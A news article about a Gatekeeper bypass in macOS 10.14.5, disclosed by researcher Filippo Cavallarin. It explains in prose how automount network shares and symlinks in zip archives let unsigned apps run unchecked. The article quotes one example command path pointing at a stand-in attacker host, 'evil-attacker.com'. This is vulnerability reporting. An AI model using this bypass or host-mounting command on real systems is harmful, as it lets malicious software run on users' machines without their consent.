It's easy to install a malicious app on a Mac. Apple has not fixed the error even after three months

27. 5. 2019

Security researcher Filippo Cavallarin posted a warning about the bug in macOS 10.14.5 on his blog. This consists in the possibility of completely bypassing Gatekeeper's security measures. According to Cavallarin, he pointed out the error to Apple already in February of this year, but the company did not fix it in the latest update.

Gatekeeper was developed by Apple and incorporated into its desktop operating system for the first time in 2012. It is a mechanism that prevents an application from running without the user's knowledge and consent. After you download an app, Gatekeeper automatically checks its code to see if the software is properly signed by Apple.

In his blog post, Cavallarin notes that Gatekeeper, by default, considers both external storage and network shares to be secure locations. Any application that resides in these targets can therefore be automatically launched without having to go through the Gatekeeper check. It is this feature that can be exploited to launch malicious software without the user's knowledge.

One aspect that allows unauthorized access is the automount feature, which allows users to automatically mount a network share simply by specifying a path beginning with "/net/". As an example, Cavallarin cites the path "ls /net/evil-attacker.com/sharedfolder/" which can cause the operating system to load the contents of a "sharefolder" folder in a remote location that can be potentially malicious.

You can watch the way the threat works in the video:

Another factor is the fact that if a zip archive containing a specific symlink leading to the automount function is shared, it will not be checked by Gatekeeper. This way, the victim can easily download the malicious archive and unzip it, allowing the attacker to run virtually any software on the Mac without the user's knowledge. The Finder, which hides certain extensions by default, also has its share of this vulnerability.

Cavallarin states on his blog that Apple drew attention to the vulnerability of the macOS operating system on February 22 of this year. But in mid-May, Apple stopped communicating with Cavallarin, so Cavallarin decided to make the whole thing public.

Source: FCVL

Topics: storage, automatic, MacOS, video lesson, Settings, function, user, Application, Apple Lossless Audio CODEC (ALAC),

Discussion of the article

Your name

Your comment

By filling in the above data, I acknowledge that the company TEXT FACTORY s.r.o., registered office in Brno, Durďákova 336/29, Černá Pole, ZIP code: 613 00, ID number: 06157831, registered at the Regional Court in Brno, section C, insert 100399, will process my personal data provided in the registration form filled out by me on the basis of the legitimate interests of TEXT FACTORY s.r.o. according to Article 6 paragraph 1 letter f) GDPR and to fulfill legal obligations (Article 6, paragraph 1, letter c) GDPR), for the following purposes: the necessity to ensure the authorization of visitors to websites operated by TEXT FACTORY s.r.o. to actively contribute to published articles or within discussion forums and exercising the rights of TEXT FACTORY s.r.o. as the administrator of these discussion forums. More information about the processing of personal data and rights can be found in Lessons on personal data protection. the entire text

It could be interest you

Related